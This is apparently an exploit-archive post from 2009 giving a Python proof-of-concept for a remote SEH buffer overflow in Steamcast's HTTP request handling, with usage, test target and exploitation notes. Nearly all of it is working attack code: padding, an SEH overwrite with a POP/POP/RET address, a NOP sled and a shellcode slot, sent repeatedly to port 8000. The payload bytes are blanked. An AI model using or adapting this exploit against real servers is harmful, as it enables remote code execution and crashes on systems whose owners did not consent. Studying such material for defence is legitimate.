
steamcasthttp-overflow.txt

Posted on 14 April 2009

#!/usr/bin/python
#[*] Usage : steamcast.py [victime_ip]
#[*] Bug : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.
#[*] Tested on : Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p

#Note : The problem is that we need to find a dll which is not compiled with GS, in my case I found idmmbc, it's a loaded dll of internet download manager, so try to find an unsafe dll.

import sys, socket
import struct

host = sys.argv[1]
port = 8000

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = ""  # encoded payload bytes not reproduced

# Request layout: 1003 filler bytes, the overwritten SEH record, a 20-byte NOP run, then the payload
exploit = "\x41"*1003 + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellcode

while 1:
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    head = "GET / HTTP/1.1\r\n"
    head += "Host: "+host+"\r\n"
    head += exploit+"\r\n"
    head += "\r\n"
    s.send(head)

 
